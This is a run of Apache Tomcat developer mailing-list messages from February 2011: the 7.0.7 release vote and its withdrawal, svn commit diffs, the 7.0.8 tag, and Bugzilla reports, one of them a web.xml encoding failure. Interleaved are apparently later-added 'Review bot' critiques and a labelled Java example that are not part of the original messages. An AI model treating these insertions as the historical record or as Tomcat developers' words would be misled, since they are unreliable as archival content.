Re: [VOTE] Release Apache Tomcat 7.0.7
On 03/02/2011 13:32, Mark Thomas wrote:

The proposed Apache Tomcat 7.0.7 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.7/

The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_7/

The proposed 7.0.7 release is:

[ ] Broken - do not release
[ ] Alpha - go ahead and release as 7.0.7 Alpha
[ ] Beta - go ahead and release as 7.0.7 Beta
[X] Stable - go ahead and release as 7.0.7 Stable

TCK passed. Been running on ASF Jira for 8+ hours with no issue (there was an OOME but all indications are that was triggered by Jira usage not a Tomcat bug).

Mark

To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: [VOTE] Release Apache Tomcat 7.0.7
On 04/02/2011 09:24, Mark Thomas wrote:

On 03/02/2011 13:32, Mark Thomas wrote:

The proposed Apache Tomcat 7.0.7 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.7/

The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_7/

The proposed 7.0.7 release is:

[ ] Broken - do not release
[ ] Alpha - go ahead and release as 7.0.7 Alpha
[ ] Beta - go ahead and release as 7.0.7 Beta
[X] Stable - go ahead and release as 7.0.7 Stable

TCK passed. Been running on ASF Jira for 8+ hours with no issue (there was an OOME but all indications are that was triggered by Jira usage not a Tomcat bug).

I should have read my e-mail before sending this. Without the fix in r1067072, it is easy to flood the logs with stack traces. I'm changing my vote to broken and I'll tag 7.0.8 shortly.

Mark
svn commit: r1067127 - /tomcat/trunk/webapps/docs/changelog.xml
Author: markt Date: Fri Feb 4 10:02:38 2011 New Revision: 1067127 URL: http://svn.apache.org/viewvc?rev=1067127view=rev Log: Update changelog Modified: tomcat/trunk/webapps/docs/changelog.xml Modified: tomcat/trunk/webapps/docs/changelog.xml URL: http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067127r1=1067126r2=1067127view=diff == --- tomcat/trunk/webapps/docs/changelog.xml (original) +++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 10:02:38 2011 @@ -49,7 +49,15 @@ /fix /changelog /subsection - subsection name=Catalina + subsection name=Coyote +changelog + fix +Reduce level of log message for invalid URL parameters from WARNING to +INFO. (markt) + /fix +/changelog + /subsection + subsection name=Other changelog fix Align server.xml installed by the Windows installer with the one @@ -59,7 +67,7 @@ /changelog /subsection /section -section name=Tomcat 7.0.7 (markt) +section name=Tomcat 7.0.7 (markt) rtext=not released subsection name=Catalina changelog fix - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067134 - in /tomcat/trunk: java/org/apache/catalina/core/ApplicationContextFacade.java webapps/docs/changelog.xml
Author: markt Date: Fri Feb 4 10:30:36 2011 New Revision: 1067134 URL: http://svn.apache.org/viewvc?rev=1067134view=rev Log: Fix https://issues.apache.org/bugzilla/show_bug.cgi?id=50709 Make ApplicationContextFacade non-final to enable extension. Modified: tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java tomcat/trunk/webapps/docs/changelog.xml Modified: tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java URL: http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java?rev=1067134r1=1067133r2=1067134view=diff == --- tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java (original) +++ tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java Fri Feb 4 10:30:36 2011 @@ -59,8 +59,7 @@ import org.apache.tomcat.util.ExceptionU * @version $Id$ */ -public final class ApplicationContextFacade -implements ServletContext { +public class ApplicationContextFacade implements ServletContext { // -- Attributes /** Modified: tomcat/trunk/webapps/docs/changelog.xml URL: http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067134r1=1067133r2=1067134view=diff == --- tomcat/trunk/webapps/docs/changelog.xml (original) +++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 10:30:36 2011 @@ -47,6 +47,10 @@ fix Fix NPE in CoyoteAdapter when postParseRequest() call fails. (kkolinko) /fix + fix + bug50709/bug: Make codeApplicationContextFacade/code non-final to + enable extension. (markt) + /fix /changelog /subsection subsection name=Coyote - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
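Review bot: The class Javadoc that ends at "@version $Id$" in ApplicationContextFacade.java should say which parts of the class are meant to be extended now that the declaration is no longer final. The facade is the ServletContext object handed to web applications, so a subclass can change what every method returns; consider marking as final the methods that subclasses must not override, and have the changelog entry for bug 50709 point at that documentation instead of only saying "to enable extension".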
DO NOT REPLY [Bug 50709] Make class org.apache.catalina.core.ApplicationContextFacade non-final
https://issues.apache.org/bugzilla/show_bug.cgi?id=50709

Mark Thomas ma...@apache.org changed:

What       | Removed | Added
Status     | NEW     | RESOLVED
Resolution |         | FIXED

--- Comment #1 from Mark Thomas ma...@apache.org 2011-02-04 05:30:54 EST ---
Fixed in 7.0.x and will be included in 7.0.8 onwards.

--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
--- You are receiving this mail because: ---
You are the assignee for the bug.
svn commit: r1067139 - /tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java
Author: markt Date: Fri Feb 4 10:38:09 2011 New Revision: 1067139 URL: http://svn.apache.org/viewvc?rev=1067139view=rev Log: Follow up to r1067039 Modified: tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java Modified: tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java URL: http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java?rev=1067139r1=1067138r2=1067139view=diff == --- tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java (original) +++ tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java Fri Feb 4 10:38:09 2011 @@ -297,7 +297,7 @@ public final class Parameters { msg.append(origValue.toString()); msg.append(' has been ignored.); log.debug(msg, e); -} else { +} else if (log.isInfoEnabled()) { msg.append(tmpName.toString()); msg.append(' with value '); msg.append(tmpValue.toString()); @@ -305,7 +305,7 @@ public final class Parameters { msg.append(value quoted here may be corrupted due to ); msg.append(the failed decoding. Use debug level logging ); msg.append(to see the original, non-corrupted values.); -log.warn(msg); +log.info(msg); } } - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
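Review bot: In the second hunk of Parameters.java, log.info(msg) still writes one message per rejected parameter, and that message is assembled from tmpName and tmpValue, both taken from the request. Wherever INFO is enabled, a client that sends many invalid parameters can still grow the log at the same rate as before, only under a different level. Consider logging once per request with a count of rejected parameters, and escaping or truncating the name and value before they are appended. The log message "Follow up to r1067039" should also state what is being followed up.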
svn commit: r1067147 - in /tomcat/trunk: java/org/apache/catalina/security/SecurityClassLoad.java webapps/docs/changelog.xml
Author: markt Date: Fri Feb 4 11:07:18 2011 New Revision: 1067147 URL: http://svn.apache.org/viewvc?rev=1067147view=rev Log: Fix security exception when running under a SecurityManager Modified: tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java tomcat/trunk/webapps/docs/changelog.xml Modified: tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java URL: http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java?rev=1067147r1=1067146r2=1067147view=diff == --- tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java (original) +++ tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java Fri Feb 4 11:07:18 2011 @@ -131,6 +131,9 @@ public final class SecurityClassLoad { throws Exception { final String basePackage = org.apache.coyote.; loader.loadClass(basePackage + http11.AbstractOutputBuffer$1); +// Make sure system property is read at this point +Class? clazz = loader.loadClass(basePackage + Constants); +clazz.newInstance(); } Modified: tomcat/trunk/webapps/docs/changelog.xml URL: http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067147r1=1067146r2=1067147view=diff == --- tomcat/trunk/webapps/docs/changelog.xml (original) +++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 11:07:18 2011 @@ -51,6 +51,10 @@ bug50709/bug: Make codeApplicationContextFacade/code non-final to enable extension. (markt) /fix + fix +When running under a security manager, user requests may fail with a +security exception. (markt) + /fix /changelog /subsection subsection name=Coyote - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
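Review bot: In the SecurityClassLoad.java hunk, clazz.newInstance() creates a throwaway Constants object only to force the class to initialize, which ties this code to Constants keeping an accessible no-argument constructor. Class.forName(basePackage + "Constants", true, loader) initializes the class without instantiating it. The comment "Make sure system property is read at this point" should name the property, and the changelog entry would be more useful to operators if it said which requests fail under a security manager.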
svn commit: r1067151 - /tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java
Author: mturk Date: Fri Feb 4 11:16:14 2011 New Revision: 1067151 URL: http://svn.apache.org/viewvc?rev=1067151view=rev Log: Do not send flush packet if explicit is false Modified: tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java Modified: tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java URL: http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java?rev=1067151r1=1067150r2=1067151view=diff == --- tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java (original) +++ tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java Fri Feb 4 11:16:14 2011 @@ -578,7 +578,7 @@ public class AjpProcessor extends Abstra */ @Override protected void flush(boolean explicit) throws IOException { -if (!finished) { +if (explicit !finished) { // Send the flush message output.write(flushMessageArray); } - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
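Review bot: With the added explicit test in flush(boolean explicit), a non-explicit flush now sends nothing, but the Javadoc that closes just above the method is not part of the change and the commit touches no changelog.xml entry, unlike the neighbouring commits. Document in the Javadoc what a caller should expect when explicit is false, and add a changelog line so the behaviour change in the AJP connector is visible to users.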
DO NOT REPLY [Bug 50709] Make class org.apache.catalina.core.ApplicationContextFacade non-final
https://issues.apache.org/bugzilla/show_bug.cgi?id=50709

--- Comment #2 from gvage...@gmail.com 2011-02-04 07:03:39 EST ---
Thanks a lot.

George
svn commit: r1067161 - in /tomcat/trunk: java/org/apache/coyote/ajp/AjpAprProtocol.java webapps/docs/changelog.xml
Author: markt Date: Fri Feb 4 12:18:00 2011 New Revision: 1067161 URL: http://svn.apache.org/viewvc?rev=1067161view=rev Log: Fix hanging Servlet 3 asynchronous requests when using the APR based AJP connector. Modified: tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java tomcat/trunk/webapps/docs/changelog.xml Modified: tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java URL: http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java?rev=1067161r1=1067160r2=1067161view=diff == --- tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java (original) +++ tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java Fri Feb 4 12:18:00 2011 @@ -195,6 +195,7 @@ public class AjpAprProtocol extends Abst // Need to make socket available for next processing cycle // but no need for the poller connections.put(socket, processor); +socket.setAsync(true); } else { if (state == SocketState.OPEN) { connections.put(socket, processor); Modified: tomcat/trunk/webapps/docs/changelog.xml URL: http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067161r1=1067160r2=1067161view=diff == --- tomcat/trunk/webapps/docs/changelog.xml (original) +++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 12:18:00 2011 @@ -63,6 +63,10 @@ Reduce level of log message for invalid URL parameters from WARNING to INFO. (markt) /fix + fix +Fix hanging Servlet 3 asynchronous requests when using the APR based AJP +connector. (markt) + /fix /changelog /subsection subsection name=Other - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
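Review bot: In the AjpAprProtocol.java hunk, socket.setAsync(true) is set on this branch but nothing in the visible context clears it again, including the else branch that re-registers the socket when state == SocketState.OPEN. If the same socket wrapper is kept for later requests on the connection, confirm where the flag is reset to false, and add a test that runs an asynchronous request followed by a normal one over the APR based AJP connector.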
svn commit: r1067169 - in /tomcat/tc7.0.x/tags/TOMCAT_7_0_8: ./ build.properties.default modules/
Author: markt Date: Fri Feb 4 12:45:08 2011 New Revision: 1067169 URL: http://svn.apache.org/viewvc?rev=1067169view=rev Log: Tag 7.0.8 Added: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ (props changed) - copied from r1067167, tomcat/trunk/ Removed: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/modules/ Modified: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default Propchange: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ -- --- svn:ignore (added) +++ svn:ignore Fri Feb 4 12:45:08 2011 @@ -0,0 +1,5 @@ +.* +output +build.properties +work +logs Propchange: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ -- svn:mergeinfo = /tomcat/tc6.0.x/trunk:742915 Modified: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default URL: http://svn.apache.org/viewvc/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default?rev=1067169r1=1067167r2=1067169view=diff == --- tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default (original) +++ tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default Fri Feb 4 12:45:08 2011 @@ -29,7 +29,7 @@ version.major=7 version.minor=0 version.build=8 version.patch=0 -version.suffix=-dev +version.suffix= # - Build control flags - # Note enabling validation uses Checkstyle which is LGPL licensed - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067170 - /tomcat/trunk/build.properties.default
Author: markt Date: Fri Feb 4 12:46:06 2011 New Revision: 1067170 URL: http://svn.apache.org/viewvc?rev=1067170view=rev Log: Bump version Modified: tomcat/trunk/build.properties.default Modified: tomcat/trunk/build.properties.default URL: http://svn.apache.org/viewvc/tomcat/trunk/build.properties.default?rev=1067170r1=1067169r2=1067170view=diff == --- tomcat/trunk/build.properties.default (original) +++ tomcat/trunk/build.properties.default Fri Feb 4 12:46:06 2011 @@ -27,7 +27,7 @@ # - Version Control Flags - version.major=7 version.minor=0 -version.build=8 +version.build=9 version.patch=0 version.suffix=-dev - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
[RESULT] [VOTE] Release Apache Tomcat 7.0.7
On 03/02/2011 13:32, Mark Thomas wrote:

The proposed Apache Tomcat 7.0.7 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.7/

The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_7/

The proposed 7.0.7 release is:

[ ] Broken - do not release
[ ] Alpha - go ahead and release as 7.0.7 Alpha
[ ] Beta - go ahead and release as 7.0.7 Beta
[ ] Stable - go ahead and release as 7.0.7 Stable

Due to a TCK failure with the APR-AJP connector and the NPE in the CoyoteAdapter, 7.0.7 is broken.

7.0.8 has been tagged and is being uploaded as I type. As soon as it is uploaded, I'll start the vote.

Mark
When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
I am using web.xml in its simplest, incomplete form (note that making it 100% Servlet API 3.0 compliant does not help)

    <?xml version="1.0" encoding="Windows-1251"?>
    <web-app>
        <!-- below are word testing Testoviy in cyrillic, try to use another symbols -->
        <display-name>Тестовый web.xml</display-name>
        <servlet>
            <servlet-name>TestJSPMount</servlet-name>
            <jsp-file>/test.jsp</jsp-file>
        </servlet>
        <servlet-mapping>
            <servlet-name>TestJSPMount</servlet-name>
            <url-pattern>/test.html</url-pattern>
        </servlet-mapping>
    </web-app>

During startup, tomcat throws exception:

04/02/2011 16:07:39 S - - StandardContext.loadOnStartup: Servlet /testcyrwebxml threw load() exception
com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException: Invalid byte 2 of 2-byte UTF-8 sequence.
    at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.invalidByte(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.read(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.load(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.peekChar(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl$FragmentContentDriver.next(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLNSDocumentScannerImpl.next(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(Unknown Source)
    at org.apache.jasper.xmlparser.ParserUtils.parseXMLDocument(ParserUtils.java:96)
    at org.apache.jasper.compiler.JspConfig.processWebDotXml(JspConfig.java:83)
    at org.apache.jasper.compiler.JspConfig.init(JspConfig.java:231)
    at org.apache.jasper.compiler.JspConfig.findJspProperty(JspConfig.java:290)
    at org.apache.jasper.compiler.Compiler.generateJava(Compiler.java:113)
    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:365)
    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:345)
    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:332)
    at org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:594)
    at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:342)
    at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:391)
    at org.apache.jasper.servlet.JspServlet.init(JspServlet.java:128)
    at org.apache.catalina.core.StandardWrapper.initServlet(StandardWrapper.java:1133)
    at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1087)
    at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:996)
    at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContext.java:4741)
    at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5062)
    at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5057)
    at java.util.concurrent.FutureTask$Sync.innerRun(Unknown Source)
    at java.util.concurrent.FutureTask.run(Unknown Source)
    at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(Unknown Source)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
    at java.lang.Thread.run(Unknown Source)

Platform in use:
Tomcat 7.0.6
JDK 1.6.0_18 x86
Windows 7 x64

If I change encoding of web.xml to UTF-8 it does not help also. The only fix for this problem is to use only ISO-8859-1 characters.

I believe it is somehow related to some early initialization sequence, when jsp is mapped as servlet.

With kindest personal regards,
Ruslan Gainutdinov
rusla...@gmail.com
Re: When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
On 04/02/2011 13:18, Huksley wrote:

During startup, tomcat throws exception:
04/02/2011 16:07:39 S - - StandardContext.loadOnStartup: Servlet /testcyrwebxml threw load() exception

Please create a Bugzilla entry for this.

Cheers,

Mark
[VOTE] Release Apache Tomcat 7.0.8
The proposed Apache Tomcat 7.0.8 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/

The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/

The proposed 7.0.8 release is:

[ ] Broken - do not release
[ ] Alpha - go ahead and release as 7.0.8 Alpha
[ ] Beta - go ahead and release as 7.0.8 Beta
[ ] Stable - go ahead and release as 7.0.8 Stable

Cheers,

Mark
DO NOT REPLY [Bug 50720] New: When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
https://issues.apache.org/bugzilla/show_bug.cgi?id=50720

Summary: When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
Product: Tomcat 7
Version: 7.0.6
Platform: PC
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
AssignedTo: dev@tomcat.apache.org
ReportedBy: cont...@ruslan.org

Created an attachment (id=26605)
--> (https://issues.apache.org/bugzilla/attachment.cgi?id=26605)
Simple test web application

I am using web.xml in its simplest, incomplete form (note that making it 100% Servlet API 3.0 compliant does not help)

    <?xml version="1.0" encoding="Windows-1251"?>
    <web-app>
        <!-- below are word testing Testoviy in cyrillic, try to use another symbols -->
        <display-name>Тестовый web.xml</display-name>
        <servlet>
            <servlet-name>TestJSPMount</servlet-name>
            <jsp-file>/test.jsp</jsp-file>
        </servlet>
        <servlet-mapping>
            <servlet-name>TestJSPMount</servlet-name>
            <url-pattern>/test.html</url-pattern>
        </servlet-mapping>
    </web-app>

During startup, tomcat throws exception:

04/02/2011 16:07:39 S - - StandardContext.loadOnStartup: Servlet /testcyrwebxml threw load() exception
com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException: Invalid byte 2 of 2-byte UTF-8 sequence.
    at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.invalidByte(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.read(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.load(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.peekChar(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl$FragmentContentDriver.next(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLNSDocumentScannerImpl.next(Unknown Source)
    at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(Unknown Source)
    at com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(Unknown Source)
    at org.apache.jasper.xmlparser.ParserUtils.parseXMLDocument(ParserUtils.java:96)
    at org.apache.jasper.compiler.JspConfig.processWebDotXml(JspConfig.java:83)
    at org.apache.jasper.compiler.JspConfig.init(JspConfig.java:231)
    at org.apache.jasper.compiler.JspConfig.findJspProperty(JspConfig.java:290)
    at org.apache.jasper.compiler.Compiler.generateJava(Compiler.java:113)
    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:365)
    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:345)
    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:332)
    at org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:594)
    at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:342)
    at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:391)
    at org.apache.jasper.servlet.JspServlet.init(JspServlet.java:128)
    at org.apache.catalina.core.StandardWrapper.initServlet(StandardWrapper.java:1133)
    at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1087)
    at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:996)
    at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContext.java:4741)
    at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5062)
    at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5057)
    at java.util.concurrent.FutureTask$Sync.innerRun(Unknown Source)
    at java.util.concurrent.FutureTask.run(Unknown Source)
    at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(Unknown Source)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
    at java.lang.Thread.run(Unknown Source)

Platform in use:
Tomcat 7.0.6 binary windows release
JDK 1.6.0_18 x86
Windows 7 x64

If I change encoding of web.xml to UTF-8 it does not help also. The only fix for this problem is to use only ISO-8859-1 characters.

I believe it is somehow related to some early initialization sequence, when jsp is mapped as servlet.
DO NOT REPLY [Bug 50720] When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
https://issues.apache.org/bugzilla/show_bug.cgi?id=50720

Konstantin Kolinko knst.koli...@gmail.com changed:

What       | Removed | Added
OS/Version |         | All

--- Comment #1 from Konstantin Kolinko knst.koli...@gmail.com 2011-02-04 09:12:28 EST ---
This is caused by the following line in o.a.j.compiler.WebXml.java:

    is = new ByteArrayInputStream(webXml.getBytes());

The above uses system encoding to convert MERGED_WEB_XML from String to byte[].

Actually InputStream is not needed there. One should use new InputSource(Reader).
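Added example, not Tomcat's code and not part of the Bugzilla comment above: it parses the same in-memory XML once through bytes produced with a stand-in for the JVM default charset and once through a Reader, which is the change the comment proposes. The class name, the sample document and the explicit Charset argument that simulates the platform default are assumptions made for the illustration, and windows-1251 must be available in the running JRE.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.Charset;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class MergedWebXmlEncodingDemo {

    // Constructed sample standing in for a merged web.xml that is held as a String.
    // The escapes spell the Cyrillic display name used in the bug report.
    static final String DISPLAY_NAME =
            "\u0422\u0435\u0441\u0442\u043e\u0432\u044b\u0439 web.xml";

    // No encoding declaration: a parser that is given raw bytes will assume UTF-8.
    static final String MERGED_WEB_XML =
            "<?xml version=\"1.0\"?>\n"
            + "<web-app><display-name>" + DISPLAY_NAME + "</display-name></web-app>";

    static DocumentBuilder newBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // The sample has no DTD, so DOCTYPE declarations are refused outright.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return factory.newDocumentBuilder();
    }

    /**
     * String -> byte[] -> parser. The bytes depend on a charset that the parser
     * is never told about, so the result changes with the platform.
     */
    static String parseViaBytes(String xml, Charset platformDefault)
            throws ParserConfigurationException, SAXException, IOException {
        // Stands in for webXml.getBytes(), which encodes with the JVM default charset.
        byte[] bytes = xml.getBytes(platformDefault);
        Document doc = newBuilder().parse(new InputSource(new ByteArrayInputStream(bytes)));
        return doc.getDocumentElement().getTextContent();
    }

    /** String -> Reader -> parser. Characters are handed over directly; no charset is involved. */
    static String parseViaReader(String xml)
            throws ParserConfigurationException, SAXException, IOException {
        Document doc = newBuilder().parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Try the byte route under two simulated platform defaults.
        for (String name : new String[] {"windows-1251", "UTF-8"}) {
            try {
                String got = parseViaBytes(MERGED_WEB_XML, Charset.forName(name));
                System.out.println("bytes/" + name + ": parsed, intact="
                        + DISPLAY_NAME.equals(got));
            } catch (IOException | SAXException e) {
                System.out.println("bytes/" + name + ": "
                        + e.getClass().getSimpleName() + ": " + e.getMessage());
            }
        }
        // The Reader route does not depend on any platform setting.
        System.out.println("reader: parsed, intact="
                + DISPLAY_NAME.equals(parseViaReader(MERGED_WEB_XML)));
    }
}
```

The byte route only works when the platform default happens to match what the parser assumes, which is why the failure shows up on some installations and not on others.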
[Tomcat Wiki] Update of PoweredBy by Ultimate Fighter
Dear Wiki user, You have subscribed to a wiki page or wiki category on Tomcat Wiki for change notification. The PoweredBy page has been changed by Ultimate Fighter. http://wiki.apache.org/tomcat/PoweredBy?action=diffrev1=311rev2=312 -- [[http://www.handybundle-finden.de/|HandyBundle-Finden]] - German site for mobile phone bundles. Based on a custom developed lucene based nosql database and running on tomcat. === Handytarife-Finden === - {{http://www.handytarife-finden.de/images/Logo.png}} [[http://www.handytarife-finden.de/|Handytarife-Finden]] - This ist a very fast search site for mobile phones and bundles. It works with an lucene based nosql database and running on an System consisting of nginx and tomcat. + {{http://www.handytarife-finden.de/images/logo.png}} [[http://www.handytarife-finden.de/|Handytarife-Finden]] - This ist a very fast search site for mobile phones and bundles. It works with an lucene based nosql database and running on an System consisting of nginx and tomcat. === Maxager === [http://www.maxager.com/home.htm ] Maxager's patented enterprise profit optimization (EPO) solutions help leading companies increase cash and profit worth 3-5% of revenue. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 49525] IE8: Unabled to store data in HttpSession (root context)
https://issues.apache.org/bugzilla/show_bug.cgi?id=49525

Bmeist br...@tigernet.com changed:

What       | Removed    | Added
Status     | RESOLVED   | REOPENED
Version    | 7.0.0      | 7.0.6
Resolution | FIXED      |
OS/Version | Windows NT | Linux

--- Comment #4 from Bmeist br...@tigernet.com 2011-02-04 11:09:55 EST ---
I am seeing this exact problem on 7.0.6, but only Tomcat on Linux. I have another install of 7.0.6 on Windows and it works fine.

